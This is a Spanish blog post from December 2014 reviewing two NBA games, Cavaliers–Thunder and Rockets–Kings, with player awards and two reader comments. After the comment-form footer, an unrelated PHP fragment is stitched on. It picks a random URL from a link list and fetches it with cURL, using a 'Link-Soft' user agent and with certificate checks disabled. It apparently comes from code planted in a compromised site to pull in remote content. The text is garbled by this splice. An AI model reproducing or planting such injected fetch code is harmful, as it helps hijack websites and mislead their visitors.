La Crónica: Noche de duelos fallidos

12 de December de 2014 por txusma

Cuando la NBA programó la jornada de ayer seguro que a más de uno se le cayó la baba, principalmente porque sería la primera oportunidad de ver cara a cara a LeBron James y Kevin Durant. Además, en Sacramento se podría contemplar un enfrentamiento entre dos súper pívots de diferentes generaciones: Dwight Howard y DeMarcus Cousins. A la hora de la verdad, de los que tenían que ser los cuatro principales protagonistas de la noche sólo uno saltó a la cancha y lejos de su mejor momento de forma.

Cavaliers 94 – Thunder 103

Minutos antes del inicio del partido saltaba la noticia: LeBron James sería baja por unas molestias en la rodilla. Su ascendencia sobre el equipo queda demostrada cuando los principales medios se refieren como “short-handed Cavaliers” a un equipo con Kyrie Irving, Kevin Love, Anderson Varejao, Tristan Thompson, Dion Waiters, etc. A la hora de la verdad los visitantes solo plantaron cara durante el primer cuarto. A falta de un minuto y medio para el descanso las rodillas de Irving y Westbrook chocaron y el de los Cavs empezó a retorcerse en el suelo con graves gestos de dolor. Se tuvo que retirar a los vestuarios pero volvió para disputar la segunda parte, para alivio de los aficionados de Ohio. De todas maneras, los Thunder salieron muy enchufados de la mano de Westbrook y a principios del último cuarto vencían por 20 puntos. Cleveland aún tuvo arrestos para acortar la diferencia per Kevin Durant, defendido por Irving en el tramo final del partido, cortó cualquier intento de remontada.

Rockets 113 – Kings 109

Lo que parecía destinado a un enfrentamiento entre titanes acabó convertido en una exhibición (otra más) de James Harden. Permitidme que liste los que fueron sus compañeros ayer: Ariza, Beverley, Motiejunas, Black, Terry, Dorsey (33 minutos jugados, ojo), Johnson y Daniels… Sin la participación de Harden este equipo sería incapaz prácticamente de ganar un partido en la D-League. Cada uno de los 44 puntos que anotó fueron esenciales. A pesar de haber fallado 17 de 26 tiros hasta el momento, suyo fue el triple que mandó el partido a la prórroga y suyos 10 de los 16 puntos que anotaron los Rockets en el tiempo extra. Los Kings llegaron a imponerse por 12 puntos de diferencia pero acabaron condenándolos sus numerosas pérdidas.

PREMIOS

MVP: Exhibición de James Harden ante los Kings. 44 puntos, 10 de ellos en la prórroga, 8 asistencias, 4 rebotes, 3 robos y 1 tapón. Toda la responsabilidad sobre sus hombros.

Rookie: Mejor corramos un tupido velo. Los mejores fueron Nick Johnson y Nik Stauskas y no pasaron de los 3 puntos…

Sorpresa: Jason Thompson apareció de la nada para anotar 13 puntos y capturar 15 rebotes. Matthew Dellavedova aprovechó su oportunidad con 14 puntos, 5 rebotes y 4 asistencias.

Decepción: Definitivamente Shawn Marion se encuentra ya en la cuesta abajo de su carrera y cada vez la pendiente parece más pronunciada. Ayer fueron sólo 2 puntos y 3 reboes en 21 minutos de juego.

Esfuerzo en vano: Los Kings forzaron la prórroga ante los Rockets en buena parte por culpa de Darren Collison. Una vez en ella, el ex de Mavs anotó 6 de sus 24 puntos finales. En ausencia de LeBron, Kevin Love fue el mejor de los Cavs con 18 puntos y 16 rebotes.

Top 5

Imágenes | AP Photos / Getty Images

Comenta

2 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    A pesar de la derrota pintan mejor estos Cavaliers,se nota una mejora considerable respecto al desastre de las primeras semanas.Algo más de sentido en el ataque y mayor implicación en la defensa,que con jugadores como Love que tienes unas carencias notables en ese apartado,al menos que cumpla bajando el culo,entorpeciendo líneas de pase…Waiters ya es un caso pérdido,es el renglón torcido del equipo,no se empana de las jugadas,se casca en el 90% de los balones lo que le llega,0 sintonía con Blatt…lo mejor que puede pasar es que siga fino en el tiro como en estos últimos partidos y a ver si lo colocan en algún lado por jugadores útiles y comprometidos en un sentido colectivo.

    Marion en el club de Garnett,id pidiendo vez para estar en el día de sus retiradas.A ver cómo van engrosando la lista otros ilustres.Por cierto que McGrady quiere volver a la NBA…para un regalito de Navidad yo no le hacía ascos.

      Citar

  2. Denise dice:
    #2

    Ruxixón:
    …Waiters ya es un caso pérdido,es el renglón torcido del equipo,no se empana de las jugadas,se casca en el 90% de los balones lo que le llega,0 sintonía con Blatt…lo mejor que puede pasar es que siga fino en el tiro como en estos últimos partidos y a ver si lo colocan en algún lado por jugadores útiles y comprometidos en un sentido colectivo.

    Marion en el club de Garnett,id pidiendo vez para estar en el día de sus retiradas.A ver cómo van engrosando la lista otros ilustres.Por cierto que McGrady quiere volver a la NBA…para un regalito de Navidad yo no le hacía ascos.

    Sonó hace unos días un posible trade Waiters por Koufos y Tayshaun Prince.

    McGrady?? T-Mac está acabado desde hace bastantes años. Preferiría invertir mejor el dinero que reclutando a este hombre del Cretácico.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>